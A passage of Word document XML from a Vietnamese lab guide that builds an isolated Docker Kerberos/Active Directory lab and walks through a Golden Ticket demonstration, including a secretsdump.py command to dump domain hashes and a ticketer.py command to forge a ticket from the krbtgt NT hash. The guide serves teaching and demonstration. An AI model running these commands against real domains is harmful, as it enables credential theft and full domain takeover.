    </w:p>
    <w:p>
      <w:r>
        <w:t>Ba file chính sẽ được tạo:</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File</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:shd w:fill="D9EAF7"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Mục đích</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>docker-compose.yml</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Dựng DC, client, attacker và mạng riêng.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>client\Dockerfile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Cài kinit/klist/smbclient/dnsutils.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>client\krb5.conf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Cấu hình realm/KDC cho client.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>attacker\Dockerfile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Cài Impacket.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>5. Tạo docker-compose.yml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:ind w:left="259" w:right="259"/>
        <w:shd w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:t>notepad .\docker-compose.yml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Dán nguyên nội dung:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:ind w:left="259" w:right="259"/>
        <w:shd w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:t>services:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  dc:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    image: nowsci/samba-domain:latest</w:t>
        <w:br/>
        <w:t xml:space="preserve">    container_name: krb-dc</w:t>
        <w:br/>
        <w:t xml:space="preserve">    hostname: dc01</w:t>
        <w:br/>
        <w:t xml:space="preserve">    privileged: true</w:t>
        <w:br/>
        <w:t xml:space="preserve">    restart: unless-stopped</w:t>
        <w:br/>
        <w:t xml:space="preserve">    environment:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      DOMAIN: LAB.KERB</w:t>
        <w:br/>
        <w:t xml:space="preserve">      DOMAINPASS: "LabAdmin!2026"</w:t>
        <w:br/>
        <w:t xml:space="preserve">      HOSTIP: 172.28.0.10</w:t>
        <w:br/>
        <w:t xml:space="preserve">      DNSFORWARDER: 1.1.1.1</w:t>
        <w:br/>
        <w:t xml:space="preserve">    volumes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - dc_data:/var/lib/samba</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - dc_config:/etc/samba/external</w:t>
        <w:br/>
        <w:t xml:space="preserve">    networks:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      labnet:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        ipv4_address: 172.28.0.10</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  client:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    build:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      context: ./client</w:t>
        <w:br/>
        <w:t xml:space="preserve">    container_name: krb-client</w:t>
        <w:br/>
        <w:t xml:space="preserve">    hostname: client01</w:t>
        <w:br/>
        <w:t xml:space="preserve">    command: ["sleep", "infinity"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    dns:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - 172.28.0.10</w:t>
        <w:br/>
        <w:t xml:space="preserve">    dns_search:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - lab.kerb</w:t>
        <w:br/>
        <w:t xml:space="preserve">    networks:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      labnet:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        ipv4_address: 172.28.0.20</w:t>
        <w:br/>
        <w:t xml:space="preserve">    depends_on:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - dc</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  attacker:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    build:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      context: ./attacker</w:t>
        <w:br/>
        <w:t xml:space="preserve">    container_name: krb-attacker</w:t>
        <w:br/>
        <w:t xml:space="preserve">    hostname: attacker01</w:t>
        <w:br/>
        <w:t xml:space="preserve">    command: ["sleep", "infinity"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    dns:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - 172.28.0.10</w:t>
        <w:br/>
        <w:t xml:space="preserve">    dns_search:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - lab.kerb</w:t>
        <w:br/>
        <w:t xml:space="preserve">    networks:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      labnet:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        ipv4_address: 172.28.0.30</w:t>
        <w:br/>
        <w:t xml:space="preserve">    depends_on:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - dc</w:t>
        <w:br/>
        <w:br/>
        <w:t>volumes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  dc_data:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  dc_config:</w:t>
        <w:br/>
        <w:br/>
        <w:t>networks:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  labnet:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    driver: bridge</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ipam:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      config:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        - subnet: 172.28.0.0/24</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Ctrl+S → đóng Notepad.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10080"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10080"/>
            <w:shd w:fill="E2F0D9"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Tại sao không publish ports?: </w:t>
            </w:r>
            <w:r>
              <w:t>Các dịch vụ chỉ cần container nói chuyện với nhau. Không publish giúp giảm nguy cơ expose DNS/Kerberos/SMB ra mạng thật.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>6. Tạo client image + krb5.conf</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:ind w:left="259" w:right="259"/>
        <w:shd w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:t>notepad .\client\Dockerfile</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:ind w:left="259" w:right="259"/>
        <w:shd w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:t>FROM debian:bookworm-slim</w:t>
        <w:br/>
        <w:br/>
        <w:t>RUN apt-get update &amp;&amp; \</w:t>
        <w:br/>
        <w:t xml:space="preserve">    DEBIAN_FRONTEND=noninteractive apt-get install -y \</w:t>
        <w:br/>
        <w:t xml:space="preserve">      krb5-user smbclient dnsutils ca-certificates &amp;&amp; \</w:t>
        <w:br/>
        <w:t xml:space="preserve">    rm -rf /var/lib/apt/lists/*</w:t>
        <w:br/>
        <w:br/>
        <w:t>COPY krb5.conf /etc/krb5.conf</w:t>
        <w:br/>
        <w:br/>
        <w:t>CMD ["sleep", "infinity"]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:ind w:left="259" w:right="259"/>
        <w:shd w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:t>notepad .\client\krb5.conf</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:ind w:left="259" w:right="259"/>
        <w:shd w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:t>[libdefaults]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    default_realm = LAB.KERB</w:t>
        <w:br/>
        <w:t xml:space="preserve">    dns_lookup_kdc = true</w:t>
        <w:br/>
        <w:t xml:space="preserve">    dns_lookup_realm = false</w:t>
        <w:br/>
        <w:t xml:space="preserve">    rdns = false</w:t>
        <w:br/>
        <w:t xml:space="preserve">    forwardable = true</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ticket_lifetime = 24h</w:t>
        <w:br/>
        <w:br/>
        <w:t>[realms]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    LAB.KERB = {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        kdc = dc01.lab.kerb</w:t>
        <w:br/>
        <w:t xml:space="preserve">        admin_server = dc01.lab.kerb</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:br/>
        <w:t>[domain_realm]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    .lab.kerb = LAB.KERB</w:t>
        <w:br/>
        <w:t xml:space="preserve">    lab.kerb = LAB.KERB</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Lưu cả hai file và đóng Notepad.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>7. Tạo attacker image</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:ind w:left="259" w:right="259"/>
        <w:shd w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:t>notepad .\attacker\Dockerfile</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:ind w:left="259" w:right="259"/>
        <w:shd w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:t>FROM python:3.12-slim</w:t>
        <w:br/>
        <w:br/>
        <w:t>RUN python -m pip install --no-cache-dir impacket</w:t>
        <w:br/>
        <w:br/>
        <w:t>CMD ["sleep", "infinity"]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Lưu và đóng Notepad.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>8. Build và khởi động</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:ind w:left="259" w:right="259"/>
        <w:shd w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:t>cd $HOME\kerberos-docker-lab</w:t>
        <w:br/>
        <w:t>docker compose config</w:t>
        <w:br/>
        <w:t>docker compose build</w:t>
        <w:br/>
        <w:t>docker compose up -d</w:t>
        <w:br/>
        <w:t>docker compose ps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Cả 3 container cần ở trạng thái Up. Xem log DC:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:ind w:left="259" w:right="259"/>
        <w:shd w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:t>docker compose logs dc --tail=100</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10080"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10080"/>
            <w:shd w:fill="FFF2CC"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Chưa chạy kinit: </w:t>
            </w:r>
            <w:r>
              <w:t>Provisioning AD có thể mất một lúc. Chỉ chuyển bước tiếp theo khi DC đã hoàn tất khởi tạo.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>9. Kiểm tra AD/KDC và tạo user</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:ind w:left="259" w:right="259"/>
        <w:shd w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:t>docker compose exec dc samba-tool domain info 127.0.0.1</w:t>
        <w:br/>
        <w:t>docker compose exec dc samba-tool user list</w:t>
        <w:br/>
        <w:t>docker compose exec dc samba-tool group list</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Tạo Alice:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:ind w:left="259" w:right="259"/>
        <w:shd w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:t>docker compose exec dc samba-tool user create alice 'Alice!2026'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Tạo thư mục test để có dịch vụ SMB cho phần chứng minh:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:ind w:left="259" w:right="259"/>
        <w:shd w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:t>docker compose exec dc bash -lc "mkdir -p /srv/labshare &amp;&amp; echo "KERBEROS LAB - authorized test" &gt; /srv/labshare/readme.txt"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Nếu shell trên image xử lý dấu ngoặc kép khác dự kiến, có thể bỏ bước tạo file; mục tiêu chính vẫn là chứng minh xác thực Kerberos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>10. Kiểm tra DNS từ client</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:ind w:left="259" w:right="259"/>
        <w:shd w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:t>docker compose exec client bash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Đây là Terminal client. Chạy:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:ind w:left="259" w:right="259"/>
        <w:shd w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:t>cat /etc/resolv.conf</w:t>
        <w:br/>
        <w:t>getent hosts dc01.lab.kerb</w:t>
        <w:br/>
        <w:t>nslookup dc01.lab.kerb</w:t>
        <w:br/>
        <w:t>nslookup -type=SRV _kerberos._tcp.lab.kerb</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10080"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10080"/>
            <w:shd w:fill="E2F0D9"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Kết quả mong đợi: </w:t>
            </w:r>
            <w:r>
              <w:t>dc01.lab.kerb phân giải về 172.28.0.10 và SRV Kerberos trỏ về DC.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10080"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10080"/>
            <w:shd w:fill="FCE4D6"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">DNS lỗi: </w:t>
            </w:r>
            <w:r>
              <w:t>Thoát bằng exit; kiểm tra docker-compose.yml có dns: 172.28.0.10. Sau khi sửa: docker compose down → docker compose up -d --build.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>11. Demo Kerberos hợp lệ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Vẫn ở client:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:ind w:left="259" w:right="259"/>
        <w:shd w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:t>date</w:t>
        <w:br/>
        <w:t>kinit alice@LAB.KERB</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Khi hỏi password, nhập:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:ind w:left="259" w:right="259"/>
        <w:shd w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:t>Alice!2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Kiểm tra TGT:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:ind w:left="259" w:right="259"/>
        <w:shd w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:t>klist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Cần thấy principal alice@LAB.KERB và ticket có krbtgt/LAB.KERB@LAB.KERB.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Sau đó thử SMB:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:ind w:left="259" w:right="259"/>
        <w:shd w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:t>smbclient -L //dc01.lab.kerb -k -N</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Ý nghĩa để thuyết trình:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Alice xác thực với KDC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>KDC cấp TGT.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Client dùng ticket thay vì gửi password cho SMB.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>DNS + realm + thời gian phải đúng.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>12. Lấy Domain SID của lab</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Mở PowerShell/Terminal host mới:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:ind w:left="259" w:right="259"/>
        <w:shd w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:t>docker compose exec dc samba-tool domain info 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Tìm dòng Domain SID. Ví dụ dưới đây chỉ là định dạng, không phải SID của bạn:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:ind w:left="259" w:right="259"/>
        <w:shd w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:t>Domain SID: S-1-5-21-xxxxxxxxxx-xxxxxxxxxx-xxxxxxxxxx</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10080"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10080"/>
            <w:shd w:fill="FCE4D6"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Không dùng SID ví dụ: </w:t>
            </w:r>
            <w:r>
              <w:t>Copy đúng Domain SID mà container của bạn trả về.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>13. Mô phỏng điều kiện dẫn tới Gold Ticket</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Gold Ticket cần bí mật của krbtgt và Domain SID. Trong lab, ta mô phỏng việc attacker đã có quyền quản trị domain và lấy được thông tin này. Đây là mô phỏng hậu quả, không phải quy trình xâm nhập vào hệ thống thật.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:ind w:left="259" w:right="259"/>
        <w:shd w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:t>docker compose exec attacker bash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Kiểm tra Impacket:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:ind w:left="259" w:right="259"/>
        <w:shd w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:t>ticketer.py -h</w:t>
        <w:br/>
        <w:t>secretsdump.py -h</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Dump dữ liệu domain bằng Administrator của chính lab:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:ind w:left="259" w:right="259"/>
        <w:shd w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:t>secretsdump.py 'LAB/Administrator:LabAdmin!2026@dc01.lab.kerb'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Tìm dòng krbtgt. Dạng điển hình:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:ind w:left="259" w:right="259"/>
        <w:shd w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:t>LAB\krbtgt:502:&lt;LMHASH&gt;:&lt;NTHASH&gt;:::</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Ghi lại chỉ phần &lt;NTHASH&gt;. Không sử dụng giá trị này ngoài lab.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>14. Tạo Golden Ticket</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Trong attacker container, thay placeholder bằng Domain SID và NTHASH thật của lab:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:ind w:left="259" w:right="259"/>
        <w:shd w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:t>ticketer.py \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -nthash '&lt;KRBTGT_NTHASH&gt;' \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -domain-sid '&lt;DOMAIN_SID&gt;' \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -domain 'LAB.KERB' \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  goldenadmin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Thành công sẽ tạo:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:ind w:left="259" w:right="259"/>
        <w:shd w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:t>goldenadmin.ccache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Tham số</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:shd w:fill="D9EAF7"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Ý nghĩa</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>-nthash</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>NT hash của krbtgt trong lab.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>-domain-sid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SID của LAB.KERB.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
